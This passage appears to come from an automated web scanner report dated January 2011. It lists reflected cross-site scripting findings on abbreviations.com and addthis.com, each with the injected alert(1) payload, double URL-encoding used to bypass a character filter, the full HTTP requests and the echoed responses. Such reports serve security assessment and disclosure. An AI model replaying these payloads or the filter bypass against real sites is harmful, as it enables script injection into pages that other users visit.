The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /random.aspxa3e63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e029e9681aa3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:45 GMT
Connection: close
Content-Length: 27357

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does random.aspxa3e63</title><script>alert(1)</script>029e9681aa3 stand for?</title>
...[SNIP]...

4.452. http://www.abbreviations.com/random.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/random.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0199%2522%253balert%25281%2529%252f%252fdc2600d1a53 was submitted in the REST URL parameter 1. This input was echoed as d0199";alert(1)//dc2600d1a53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /random.aspxd0199%2522%253balert%25281%2529%252f%252fdc2600d1a53 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:27:19 GMT
Connection: close
Content-Length: 26825

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "random.aspxd0199";alert(1)//dc2600d1a53";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "random.aspxd0199";alert(1)//dc2600d1a53" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.hr
...[SNIP]...

4.453. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8b29%2522%253balert%25281%2529%252f%252f3fbc9a897bd was submitted in the REST URL parameter 1. This input was echoed as c8b29";alert(1)//3fbc9a897bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /searchAmazon.aspxc8b29%2522%253balert%25281%2529%252f%252f3fbc9a897bd HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:07 GMT
Connection: close
Content-Length: 26968

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "searchAmazon.aspxc8b29";alert(1)//3fbc9a897bd";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchAmazon.aspxc8b29";alert(1)//3fbc9a897bd" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.locat
...[SNIP]...

4.454. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81f14%253cscript%253ealert%25281%2529%253c%252fscript%253e1dcba33aba9 was submitted in the REST URL parameter 1. This input was echoed as 81f14<script>alert(1)</script>1dcba33aba9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /searchAmazon.aspx81f14%253cscript%253ealert%25281%2529%253c%252fscript%253e1dcba33aba9 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:30:35 GMT
Connection: close
Content-Length: 27304

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>1dcba33aba9";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchAmazon.aspx81f14<script>alert(1)</script>1dcba33aba9" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "searchAmazon.aspx81f14<script>
...[SNIP]...

4.455. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 12886%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65482f9cb43 was submitted in the REST URL parameter 1. This input was echoed as 12886</title><script>alert(1)</script>65482f9cb43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /searchAmazon.aspx12886%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65482f9cb43 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:32:50 GMT
Connection: close
Content-Length: 27554

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does searchAmazon.aspx12886</title><script>alert(1)</script>65482f9cb43 stand for?</title>
...[SNIP]...

4.456. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de701%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9e42a89191 was submitted in the REST URL parameter 1. This input was echoed as de701"><script>alert(1)</script>e9e42a89191 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /searchAmazon.aspxde701%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9e42a89191 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:43 GMT
Connection: close
Content-Length: 27373

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does searchAmazon.aspxde701"><script>alert(1)</script>e9e42a89191 stand for?, What does searchAmazon.aspxde701">
...[SNIP]...

4.457. http://www.abbreviations.com/searchAmazon.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e03"%3balert(1)//fb56f9bdb1a was submitted in the st parameter. This input was echoed as 55e03";alert(1)//fb56f9bdb1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /searchAmazon.aspx?st=55e03"%3balert(1)//fb56f9bdb1a HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

4.458. http://www.abbreviations.com/searchAmazon.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 9c244<script>alert(1)</script>f6f6f282acc was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=9c244<script>alert(1)</script>f6f6f282acc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

4.459. http://www.abbreviations.com/searchAmazon.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 16b98</title><script>alert(1)</script>ea6b04fea67 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=16b98</title><script>alert(1)</script>ea6b04fea67 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

4.460. http://www.abbreviations.com/searchAmazon.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9142f"><script>alert(1)</script>d31baaf031c was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=9142f"><script>alert(1)</script>d31baaf031c HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

4.461. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 6fe0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34856c7ba54 was submitted in the REST URL parameter 1. This input was echoed as 6fe0e</title><script>alert(1)</script>34856c7ba54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /searchgoogle.aspx6fe0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34856c7ba54?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:43:06 GMT
Connection: close
Content-Length: 27628

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does searchgoogle.aspx6fe0e</title><script>alert(1)</script>34856c7ba54?st= stand for?</title>
...[SNIP]...

4.462. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9deee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2e9cafcbb0 was submitted in the REST URL parameter 1. This input was echoed as 9deee"><script>alert(1)</script>b2e9cafcbb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /searchgoogle.aspx9deee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2e9cafcbb0?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:38:26 GMT
Connection: close
Content-Length: 27481

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does searchgoogle.aspx9deee"><script>alert(1)</script>b2e9cafcbb0?st= stand for?, What does searchgoogle.aspx9deee">
...[SNIP]...

4.463. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d7e60%253cscript%253ealert%25281%2529%253c%252fscript%253e4a356520f9b was submitted in the REST URL parameter 1. This input was echoed as d7e60<script>alert(1)</script>4a356520f9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /searchgoogle.aspxd7e60%253cscript%253ealert%25281%2529%253c%252fscript%253e4a356520f9b?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:41:11 GMT
Connection: close
Content-Length: 27446

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>4a356520f9b?st=";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchgoogle.aspxd7e60<script>alert(1)</script>4a356520f9b?st=" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "searchgoogle.aspxd7e60<script>
...[SNIP]...

4.464. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6035c%2522%253balert%25281%2529%252f%252fbcb3780252b was submitted in the REST URL parameter 1. This input was echoed as 6035c";alert(1)//bcb3780252b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /searchgoogle.aspx6035c%2522%253balert%25281%2529%252f%252fbcb3780252b?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:43 GMT
Connection: close
Content-Length: 27095

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "searchgoogle.aspx6035c";alert(1)//bcb3780252b?st=";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchgoogle.aspx6035c";alert(1)//bcb3780252b?st=" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
wind
...[SNIP]...

4.465. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68d3f"-alert(1)-"252ce06ac3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php68d3f"-alert(1)-"252ce06ac3b HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=60shcckh91q4gr3p48mb8j2sb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php68d3f"-alert(1)-"252ce06ac3b";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.466. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5469c<script>alert(1)</script>694be222f67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php5469c<script>alert(1)</script>694be222f67 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=3djnq75atcfpbioq7ivu4ugpn2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php5469c<script>alert(1)</script>694be222f67</strong>
...[SNIP]...

4.467. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c000a"-alert(1)-"d2071d67556 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php/c000a"-alert(1)-"d2071d67556 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/c000a"-alert(1)-"d2071d67556";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.468. http://www.addthis.com/bookmark.php [pub parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

